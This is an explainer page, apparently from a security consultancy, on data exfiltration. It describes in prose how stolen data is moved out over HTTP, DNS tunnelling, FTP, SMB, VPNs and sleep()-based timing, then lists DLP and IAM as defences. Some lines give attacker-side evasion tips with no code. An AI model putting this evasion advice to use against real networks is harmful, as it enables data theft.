What is Data exfiltration?

Data exfiltration, also known as data extrusion or data theft, is the unauthorized transfer of data from a system or network. This can occur both manually through insiders and automatically through malware. Data exfiltration is one of the most serious threats to cybersecurity as it affects valuable and often confidential information such as customer and financial data. An attack can result in enormous financial losses as well as significant damage to the reputation of a company or government agency.

Types of Data Exfiltration

  1. Manual Data Exfiltration:
    This often occurs through insiders who share data via email, portable devices like USB sticks, or by uploading to external cloud services. Individual attackers can also manually steal sensitive data by exploiting security vulnerabilities to exfiltrate data through a suitable channel.
  2. Automated Data Exfiltration:
    Here, attackers use malware to continuously collect sensitive data and send it to an external server.

How does Data Exfiltration occur?

Data exfiltration can be accomplished through various techniques, including the manipulation of network protocols such as HTTP and DNS, as well as through the use of timing channels. These methods exploit weaknesses in networks to steal sensitive data unnoticed. Often, exfiltration begins through social engineering or the exploitation of security vulnerabilities in systems.

Exfiltration via HTTP/HTTPS

  1. Hidden Data Transfer:
    Attackers disguise stolen data as regular HTTP traffic to bypass firewalls and other security measures. An example would be embedding sensitive data in images that are then downloaded via browser. In the logs, it appears as if the user is only downloading images that are presumably embedded in a website.
  2. Use of Open HTTP Connections:
    Weakly secured HTTP connections can be exploited to transfer sensitive data unnoticed in smaller packets.
  3. Use of Trusted Connections:
    Many firewalls are configured to block the vast majority of HTTP traffic - exceptions are quite often connections to cloud providers - especially AWS or Google.
  4. Use of POST:
    Instead of transmitting data via URL or path, attackers can also use POST requests to transfer data. In this case, the data often isn't really logged. In poorly protected environments without DLP, this is often a very good choice.

Exfiltration via DNS

  1. DNS Tunneling:
    Here, attackers use the DNS protocol to establish a tunnel for transferring data to an external server. While HTTP and other protocols are blocked by firewalls, DNS is relatively rarely blocked.
  2. Low-throughput DNS Exfiltration:
    By slowly and continuously sending small data packets via DNS requests, the attack often remains undetected for a long time.

Exfiltration via FTP/FTPS

  1. FTP Transfer:
    Before using complex methods like DNS, attackers often test the availability of FTP or FTPS. This simple protocol allows easy copying of large amounts of data to an external server.

Exfiltration via SMB

  1. Server Message Block:
    This protocol is also well-suited for pushing data from Server A to Server B and should therefore be blocked or monitored accordingly.

Exfiltration Using VPNs

  1. Encrypted Connections:
    VPN connections are typically strongly encrypted and allow attackers to exfiltrate data unnoticed. The data is encrypted and difficult to view/analyze - which is an advantage when DLP solutions are used.

Blind Extraction via sleep() (or comparable functions)

  1. Timings:
    If you have direct access to the output (which is the case with web applications, for example), but can't extract anything via HTTP or DNS, but have the ability to execute commands, you can extract data via sleep() or similar functions. Here, you define the injected code to take a long time if the first character is "a". This process takes quite long and is complex, but it is possible.

Hackers usually always find a good way to steal data. Some of the most important protocols were mentioned here - however, there are many more possibilities: SSH, ICMP, SMTP would be the more well-known ones.

How can Data Exfiltration be prevented?

To effectively prevent data exfiltration, companies rely on a combination of technical measures and employee training. Since most exfiltrations are caused by human error or phishing attacks, employee training is a crucial protection mechanism. Additionally, technologies such as Data Loss Prevention (DLP) and Identity and Access Management (IAM) play a central role in protecting sensitive data.

Protection Measures

  1. Data Loss Prevention (DLP):
    DLP solutions monitor data traffic and prevent sensitive data from leaving the network unauthorized.
  2. Identity and Access Management (IAM):
    With IAM systems, access to sensitive data is strictly controlled so that only authorized persons can view or transfer it.

Topics on Datenexfiltration

More info material

Thank you for your feedback! We will review it and optimize this content.

Do you have feedback on Data exfiltration? Tell us!

Damian Strobel
We can check for you whether your applications and systems allow data exfiltration.

Services

Penetration testing

Penetration testing

Focused search for security vulnerabilities in your software products and servers.

Red Teaming

Simulation of real attacks on your company including people, infrastructure and processes.

Phishing

Phishing exercises increase your employees' awareness of real attacks via email.

Overview of all services